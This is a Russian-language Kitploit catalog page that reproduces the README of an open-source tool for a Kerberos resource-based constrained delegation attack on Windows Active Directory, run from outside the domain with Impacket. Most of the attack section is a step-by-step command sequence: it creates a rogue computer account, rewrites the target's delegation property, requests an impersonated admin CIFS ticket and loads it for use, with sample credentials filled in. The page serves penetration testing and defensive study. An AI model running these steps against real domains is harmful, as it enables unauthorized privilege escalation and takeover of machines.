Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
rbcd-attack — Атака Kerberos с делегированием, ограниченным на основе ресурсов, извне с использованием Impacket | Kitploit
Инструменты/GitHubGitHub/tothi/rbcd-attack
Повышение привилегийЭксплуатацияТестирование на Проникновение
GitHubtothi/rbcd-attack

rbcd-attack

Атака Kerberos с делегированием, ограниченным на основе ресурсов, извне с использованием Impacket

Репозиторий
646721 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Злоупотребление делегированием на основе ресурсов Kerberos

TL;DR

В этом репозитории описывается практическая атака на делегирование на основе ресурсов Kerberos в домене Windows Active Directory.

Отличие от других распространённых реализаций в том, что атака запускается из-за пределов домена Windows, а не с компьютера, входящего в домен (обычно Windows).

Атака реализована только с использованием Python3 Impacket (и его зависимостей). Протестировано на Arch с актуальной версией Impacket (на момент написания 0.9.21).

Лог атаки

Атака

Кратко, без углубления в детали, атака нацелена на компьютер домена, а именно на субъекты служб, связанные с целевым компьютером домена.

В качестве предварительных условий нам потребуется:

  • учётная запись домена с правом записи на целевой компьютер (именно права записи в свойство msDS-AllowedToActOnBehalfOfOtherIdentity объекта компьютера в домене)
  • разрешение на создание новых учётных записей компьютеров (обычно это значение по умолчанию, см. MachineAccountQuota)
  • доступ к контроллеру домена по LDAP (389/tcp) и SAMR (445/tcp) (или LDAPS (636/tcp))
  • доступ к контроллеру домена по Kerberos (88/tcp)

Путь атаки на очень высоком уровне:

  1. Создать фиктивный компьютер
  2. Злоупотребить свойством msDS-AllowedToActOnBehalfOfOtherIdentity целевого компьютера
  3. Запросить олицетворённые служебные билеты (S4U) для целевого компьютера

Преимущество:

  • Олицетворённые служебные билеты могут предоставить доступ на уровень высоких привилегий к службам на целевой системе, таким как CIFS, HTTP и т.д., если олицетворяемая учётная запись имеет соответствующие привилегии. Иногда это приводит к полному захвату компьютера.

Обычные инструменты

Обычные инструменты для этой атаки работают на компьютере Windows, входящем в домен, с использованием:

  • Powermad для добавления новых учётных записей компьютеров
  • Powerview из ветки dev PowerSploit для злоупотребления msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus для операций с билетами S4U

Реализация на Impacket

Эта реализация использует чистый Impacket из-за пределов домена.

Создание фиктивного компьютера

Используя пример addcomputer.py из Impacket, создадим фиктивный компьютер (назовём его evilcomputer):

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Изменение прав делегирования

Реализован скрипт rbcd.py, который находится в этом репозитории и добавляет дескриптор безопасности только что созданного EVILCOMPUTER в свойство msDS-AllowedToActOnBehalfOfOtherIdentity целевого компьютера.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

Скрипт активно использует классы Python из примера ntlmrelayx.py в Impacket. Для справки и примера вызова запустите скрипт без параметров.

Получение олицетворённого служебного билета

Теперь всё готово для злоупотребления ограниченным делегированием с помощью запроса S4U2Self и получения олицетворённого служебного билета для целевого компьютера. Используем пример скрипта getST.py из Impacket:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

Приведённая выше команда получает служебный билет CIFS от имени целевого пользователя домена admin и сохраняет его в файле admin.ccache.

После добавления пути к файлу в переменную KRB5CCNAME билет становится доступным для клиентов Kerberos.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

Ссылки

Подробнее о злоупотреблении делегированием на основе ресурсов:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

И одна из самых полных презентаций об атаках на Kerberos:

  • Слайды «Построение атак на Kerberos с помощью примитивов делегирования» на Defcon от Элада Шамира и Мэтта Буша
Скачать инструмент